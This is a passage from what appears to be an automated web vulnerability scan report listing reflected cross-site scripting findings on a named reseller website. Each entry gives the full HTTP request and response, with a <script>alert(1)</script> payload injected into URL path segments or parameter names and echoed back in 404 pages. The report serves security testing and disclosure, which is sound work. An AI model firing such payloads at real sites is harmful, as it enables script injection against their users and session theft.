<p>The requested URL /detail/45/themes/kosmos/images/?d98fe<script>alert(1)</script>eddf6cef65b=1 was not found on this server.</p>
...[SNIP]...

2.3206. http://www.resellerbase.com/detail/45/themes/kosmos/images/rating/ [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/detail/45/themes/kosmos/images/rating/

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload 7a9ba<script>alert(1)</script>8c67de92cac was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail7a9ba<script>alert(1)</script>8c67de92cac/45/themes/kosmos/images/rating/ HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=deleted; COOKIE_SORT_BY=deleted; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:23:31 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail7a9ba<script>alert(1)</script>8c67de92cac/45/themes/kosmos/images/rating/ was not found on this server.</p>
...[SNIP]...

2.3207. http://www.resellerbase.com/detail/45/themes/kosmos/images/rating/ [REST URL parameter 2] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/detail/45/themes/kosmos/images/rating/

Issue detail

The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload 1513a<script>alert(1)</script>8b7f25b2e62 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail/451513a<script>alert(1)</script>8b7f25b2e62/themes/kosmos/images/rating/ HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=deleted; COOKIE_SORT_BY=deleted; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:23:41 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/451513a<script>alert(1)</script>8b7f25b2e62/themes/kosmos/images/rating/ was not found on this server.</p>
...[SNIP]...

2.3208. http://www.resellerbase.com/detail/45/themes/kosmos/images/rating/ [REST URL parameter 3] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/detail/45/themes/kosmos/images/rating/

Issue detail

The value of REST URL parameter 3 is copied into the HTML document as plain text between tags. The payload a8eef<script>alert(1)</script>380db4fcc77 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail/45/themesa8eef<script>alert(1)</script>380db4fcc77/kosmos/images/rating/ HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=deleted; COOKIE_SORT_BY=deleted; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:23:53 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/45/themesa8eef<script>alert(1)</script>380db4fcc77/kosmos/images/rating/ was not found on this server.</p>
...[SNIP]...

2.3209. http://www.resellerbase.com/detail/45/themes/kosmos/images/rating/ [REST URL parameter 4] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/detail/45/themes/kosmos/images/rating/

Issue detail

The value of REST URL parameter 4 is copied into the HTML document as plain text between tags. The payload d9a73<script>alert(1)</script>d8061678f88 was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail/45/themes/kosmosd9a73<script>alert(1)</script>d8061678f88/images/rating/ HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=deleted; COOKIE_SORT_BY=deleted; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:24:03 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/45/themes/kosmosd9a73<script>alert(1)</script>d8061678f88/images/rating/ was not found on this server.</p>
...[SNIP]...

2.3210. http://www.resellerbase.com/detail/45/themes/kosmos/images/rating/ [REST URL parameter 5] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/detail/45/themes/kosmos/images/rating/

Issue detail

The value of REST URL parameter 5 is copied into the HTML document as plain text between tags. The payload 10f00<script>alert(1)</script>4b74f3d7466 was submitted in the REST URL parameter 5. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail/45/themes/kosmos/images10f00<script>alert(1)</script>4b74f3d7466/rating/ HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=deleted; COOKIE_SORT_BY=deleted; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:24:16 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/45/themes/kosmos/images10f00<script>alert(1)</script>4b74f3d7466/rating/ was not found on this server.</p>
...[SNIP]...

2.3211. http://www.resellerbase.com/detail/45/themes/kosmos/images/rating/ [REST URL parameter 6] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/detail/45/themes/kosmos/images/rating/

Issue detail

The value of REST URL parameter 6 is copied into the HTML document as plain text between tags. The payload 3cc51<script>alert(1)</script>094329493a5 was submitted in the REST URL parameter 6. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail/45/themes/kosmos/images/rating3cc51<script>alert(1)</script>094329493a5/ HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=deleted; COOKIE_SORT_BY=deleted; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:24:27 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/45/themes/kosmos/images/rating3cc51<script>alert(1)</script>094329493a5/ was not found on this server.</p>
...[SNIP]...

2.3212. http://www.resellerbase.com/detail/45/themes/kosmos/images/rating/ [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/detail/45/themes/kosmos/images/rating/

Issue detail

The name of an arbitrarily supplied request parameter is copied into the HTML document as plain text between tags. The payload ecbb7<script>alert(1)</script>7c6ffb43c14 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail/45/themes/kosmos/images/rating/?ecbb7<script>alert(1)</script>7c6ffb43c14=1 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=deleted; COOKIE_SORT_BY=deleted; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:23:15 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/45/themes/kosmos/images/rating/?ecbb7<script>alert(1)</script>7c6ffb43c14=1 was not found on this server.</p>
...[SNIP]...

2.3213. http://www.resellerbase.com/detail/45/themes/kosmos/images/rating/3half.gif [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/detail/45/themes/kosmos/images/rating/3half.gif

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload 14c2d<script>alert(1)</script>0a3b1ab6c03 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail14c2d<script>alert(1)</script>0a3b1ab6c03/45/themes/kosmos/images/rating/3half.gif HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Thu, 18 Nov 2010 00:39:14 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail14c2d<script>alert(1)</script>0a3b1ab6c03/45/themes/kosmos/images/rating/3half.gif was not found on this server.</p>
...[SNIP]...

2.3214. http://www.resellerbase.com/detail/45/themes/kosmos/images/rating/3half.gif [REST URL parameter 2] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/detail/45/themes/kosmos/images/rating/3half.gif

Issue detail

The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload ba2b3<script>alert(1)</script>b0d21166ad6 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail/45ba2b3<script>alert(1)</script>b0d21166ad6/themes/kosmos/images/rating/3half.gif HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Thu, 18 Nov 2010 00:39:25 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/45ba2b3<script>alert(1)</script>b0d21166ad6/themes/kosmos/images/rating/3half.gif was not found on this server.</p>
...[SNIP]...

2.3215. http://www.resellerbase.com/detail/45/themes/kosmos/images/rating/3half.gif [REST URL parameter 3] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/detail/45/themes/kosmos/images/rating/3half.gif

Issue detail

The value of REST URL parameter 3 is copied into the HTML document as plain text between tags. The payload 5372e<script>alert(1)</script>0da66f7f54d was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail/45/themes5372e<script>alert(1)</script>0da66f7f54d/kosmos/images/rating/3half.gif HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Thu, 18 Nov 2010 00:39:38 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/45/themes5372e<script>alert(1)</script>0da66f7f54d/kosmos/images/rating/3half.gif was not found on this server.</p>
...[SNIP]...

2.3216. http://www.resellerbase.com/detail/45/themes/kosmos/images/rating/3half.gif [REST URL parameter 4] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/detail/45/themes/kosmos/images/rating/3half.gif

Issue detail

The value of REST URL parameter 4 is copied into the HTML document as plain text between tags. The payload 2f828<script>alert(1)</script>3f876bafc39 was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail/45/themes/kosmos2f828<script>alert(1)</script>3f876bafc39/images/rating/3half.gif HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Thu, 18 Nov 2010 00:39:55 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/45/themes/kosmos2f828<script>alert(1)</script>3f876bafc39/images/rating/3half.gif was not found on this server.</p>
...[SNIP]...

2.3217. http://www.resellerbase.com/detail/45/themes/kosmos/images/rating/3half.gif [REST URL parameter 5] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/detail/45/themes/kosmos/images/rating/3half.gif

Issue detail

The value of REST URL parameter 5 is copied into the HTML document as plain text between tags. The payload 63e63<script>alert(1)</script>968d68c0d9d was submitted in the REST URL parameter 5. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail/45/themes/kosmos/images63e63<script>alert(1)</script>968d68c0d9d/rating/3half.gif HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Thu, 18 Nov 2010 00:40:06 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/45/themes/kosmos/images63e63<script>alert(1)</script>968d68c0d9d/rating/3half.gif was not found on this server.</p>
...[SNIP]...

2.3218. http://www.resellerbase.com/detail/45/themes/kosmos/images/rating/3half.gif [REST URL parameter 6] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/detail/45/themes/kosmos/images/rating/3half.gif

Issue detail

The value of REST URL parameter 6 is copied into the HTML document as plain text between tags. The payload 42936<script>alert(1)</script>dca18a01d42 was submitted in the REST URL parameter 6. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail/45/themes/kosmos/images/rating42936<script>alert(1)</script>dca18a01d42/3half.gif HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Thu, 18 Nov 2010 00:40:19 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/45/themes/kosmos/images/rating42936<script>alert(1)</script>dca18a01d42/3half.gif was not found on this server.</p>
...[SNIP]...

2.3219. http://www.resellerbase.com/detail/45/themes/kosmos/images/rating/3half.gif [REST URL parameter 7] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/detail/45/themes/kosmos/images/rating/3half.gif

Issue detail

The value of REST URL parameter 7 is copied into the HTML document as plain text between tags. The payload 83bf2<script>alert(1)</script>1f091db20b6 was submitted in the REST URL parameter 7. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail/45/themes/kosmos/images/rating/3half.gif83bf2<script>alert(1)</script>1f091db20b6 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Thu, 18 Nov 2010 00:40:31 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/45/themes/kosmos/images/rating/3half.gif83bf2<script>alert(1)</script>1f091db20b6 was not found on this server.</p>
...[SNIP]...

2.3220. http://www.resellerbase.com/detail/45/themes/kosmos/images/rating/3half.gif [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/detail/45/themes/kosmos/images/rating/3half.gif

Issue detail

The name of an arbitrarily supplied request parameter is copied into the HTML document as plain text between tags. The payload c5556<script>alert(1)</script>6dfc677b76 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail/45/themes/kosmos/images/rating/3half.gif?c5556<script>alert(1)</script>6dfc677b76=1 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Thu, 18 Nov 2010 00:38:56 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/45/themes/kosmos/images/rating/3half.gif?c5556<script>alert(1)</script>6dfc677b76=1 was not found on this server.</p>
...[SNIP]...

2.3221. http://www.resellerbase.com/detail/45/themes/kosmos/images/rating/search.php [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/detail/45/themes/kosmos/images/rating/search.php

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload 80153<script>alert(1)</script>58ffce940b was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail80153<script>alert(1)</script>58ffce940b/45/themes/kosmos/images/rating/search.php?keyword=search...&Submit3=Search&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/45/themes/kosmos/images/rating/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:25:13 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail80153<script>alert(1)</script>58ffce940b/45/themes/kosmos/images/rating/search.php?keyword=search...&Submit3=Search&opt=2 was not found on this server.</p>
...[SNIP]...

2.3222. http://www.resellerbase.com/detail/45/themes/kosmos/images/rating/search.php [REST URL parameter 2] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/detail/45/themes/kosmos/images/rating/search.php

Issue detail

The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload b29b9<script>alert(1)</script>2bf37bed641 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail/45b29b9<script>alert(1)</script>2bf37bed641/themes/kosmos/images/rating/search.php?keyword=search...&Submit3=Search&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/45/themes/kosmos/images/rating/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:25:24 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/45b29b9<script>alert(1)</script>2bf37bed641/themes/kosmos/images/rating/search.php?keyword=search...&Submit3=Search&opt=2 was not found on this server.</p>
...[SNIP]...

2.3223. http://www.resellerbase.com/detail/45/themes/kosmos/images/rating/search.php [REST URL parameter 3] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/detail/45/themes/kosmos/images/rating/search.php

Issue detail

The value of REST URL parameter 3 is copied into the HTML document as plain text between tags. The payload c2f62<script>alert(1)</script>ff33b92b0a0 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail/45/themesc2f62<script>alert(1)</script>ff33b92b0a0/kosmos/images/rating/search.php?keyword=search...&Submit3=Search&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/45/themes/kosmos/images/rating/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:25:37 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/45/themesc2f62<script>alert(1)</script>ff33b92b0a0/kosmos/images/rating/search.php?keyword=search...&Submit3=Search&opt=2 was not found on this server.</p>
...[SNIP]...

2.3224. http://www.resellerbase.com/detail/45/themes/kosmos/images/rating/search.php [REST URL parameter 4] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/detail/45/themes/kosmos/images/rating/search.php

Issue detail

The value of REST URL parameter 4 is copied into the HTML document as plain text between tags. The payload 9cca9<script>alert(1)</script>f29d711b862 was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail/45/themes/kosmos9cca9<script>alert(1)</script>f29d711b862/images/rating/search.php?keyword=search...&Submit3=Search&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/45/themes/kosmos/images/rating/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:25:57 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
